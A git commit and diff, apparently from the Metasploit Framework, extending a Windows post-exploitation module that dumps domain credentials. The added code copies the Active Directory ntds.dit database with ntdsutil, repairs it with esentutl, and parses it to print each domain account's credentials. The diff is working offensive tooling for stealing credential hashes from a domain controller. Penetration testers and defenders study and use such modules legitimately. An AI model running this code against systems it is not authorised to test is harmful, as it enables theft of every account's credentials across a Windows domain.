begin parsing of the database

David Maloney · David Maloney · commit 21004046c1e3 · 2015-05-11T14:48:12.000-05:00
clean up and begin aprsing the database
after we have copied it

MSP-12358
diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'metasploit/framework/ntds/parser'
 
 class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
@@ -32,6 +33,14 @@ def initialize(info={})
   def run
     if preconditions_met?
       ntds_file = copy_database_file
+      unless ntds_file.nil?
+        print_status "Repairing NTDS database after copy..."
+        print_status repair_ntds(ntds_file)
+        ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
+        ntds_parser.each_account do |ad_account|
+          print_good ad_account.to_s
+        end
+      end
     end
   end
 
@@ -65,6 +74,7 @@ def ntdsutil_method
     result = cmd_exec("ntdsutil.exe", command_arguments)
     if result.include? "IFM media created successfully"
       file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
+      print_status "NTDS database copied to #{file_path}"
     else
       print_error "There was an error copying the ntds.dit file!"
       file_path = nil
@@ -94,6 +104,11 @@ def preconditions_met?
     return status
   end
 
+  def repair_ntds(path='')
+    arguments = "/p /o \"#{path}\""
+    cmd_exec("esentutl", arguments)
+  end
+
   def vss_method
 
   end
